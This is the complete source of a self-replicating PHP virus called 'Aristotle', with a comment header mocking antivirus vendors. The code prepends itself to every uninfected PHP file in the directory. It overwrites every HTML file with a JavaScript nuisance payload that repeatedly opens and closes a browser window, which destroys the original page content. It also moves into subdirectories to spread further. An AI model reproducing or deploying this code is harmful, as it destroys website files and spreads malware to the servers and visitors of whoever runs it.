/*             Aristotle/PHP
   prepender with cross infector js payload.
                 by synge
Shouts to SPTH who started PHP fun! Fuck AV'ers  */

<?php // Aristotle

   $file = $_SERVER["SCRIPT_NAME"];
   $break = Explode('/', $file);			
   $pfile = $break[count($break) - 1];              // Get current script name
   $handle = fopen($pfile, 'rb');
   $aris = fread($handle, 4829);                    // Read Virus into variable
   fclose($handle);
   $dir=opendir('.');
        
        while (($file = readdir($dir)) !== false)           // Open current dir for scan
            {
                      
              if (strstr($file,'.html'))                   // If find an html file
              {
  
                      $arisjs='<html>'.chr(13).chr(10);
                      $arisjs.='<head>'.chr(13).chr(10);
  	              $arisjs.='<title>'.chr(13).chr(10);
  	              $arisjs.='</title>'.chr(13).chr(10);
                      $arisjs.='<SCRIPT LANGUAGE='.chr(34).'Javascript'.chr(34).'>'.chr(13).chr(10);
                      $arisjs.='var x = 10'.chr(13).chr(10);                 
                      $arisjs.='var y = 1 '.chr(13).chr(10);                           
                      $arisjs.='function startClock(){ '.chr(13).chr(10);
                      $arisjs.='x = x-y '.chr(13).chr(10);
                      $arisjs.='setTimeout('.chr(34).'startClock()'.chr(34).', 10)'.chr(13).chr(10);   /* Infects HTML file                                                                                                              with js payload                                                                                                                 and HTML */
                      $arisjs.='if(x==0)'.chr(13).chr(10);
                      $arisjs.='{'.chr(13).chr(10); 
  		      $arisjs.='aristotle = window.open('.chr(34).'http://www.ibiblio.org/wm/paint/auth/rembrandt/1650/aristotle-homer.jpg'.chr(34).')'.chr(13).chr(10);                                                                                                                    
                      $arisjs.='setTimeout('.chr(34).'aristotle.close()'.chr(34).',20)'.chr(13).chr(10);
                      $arisjs.='x=10'.chr(13).chr(10); 
                      $arisjs.='}'.chr(13).chr(10);                                         /* This code creates a function
                      $arisjs.='}'.chr(13).chr(10);                                              which opens a webpage
                      $arisjs.='</SCRIPT>'.chr(13).chr(10);                                     in an on and off loop    */
                      $arisjs.='</HEAD>'.chr(13).chr(10); 
                      $arisjs.='<BODY BGCOLOR='.chr(34).'#FFFFFF'.chr(34).' onLoad='.chr(34).'startClock()'.chr(34).'>'.chr(13).chr(10);                                                                              
                      $arisjs.='Change in all things is sweet.'.chr(13).chr(10);     // When HTML file opens run function
                      $arisjs.='- Aristotle'.chr(13).chr(10); 
                      $arisjs.='</BODY>'.chr(13).chr(10);
                      $arisjs.='</HTML>'.chr(13).chr(10);

                              $b = fopen($file, 'w');
                              fwrite($b,$arisjs);
                              fclose($b);                                           // Write HTML and JS Payload to victim
                                  
                }
                        
                     if (strstr($file,'.php'))                                     // If find a php file
                      {  
                          if (!strstr($file, 'Aristotle'))                        // If not virus file original
                           {  

                             $a = fopen($file,'rb');             
                             $contents = fread($a, filesize($file));              // If marker not in victim 
                             if (!strstr($contents, 'Aristotle'))
                               {
                                  
                                  fclose($a);
                                  $b = fopen($file,'w');                  
                                  fwrite($b, $aris.$contents);                    // Open to write and prepend virus
                                  fclose($b);
                               }

                          }
                     }
             
                    if (is_dir($file)) 
                        { 
                           if (!strstr($file, '.')) { chdir($file); }       // If file found is directory, Change to dir
                        } 
                    }
     closedir($dir);    
?>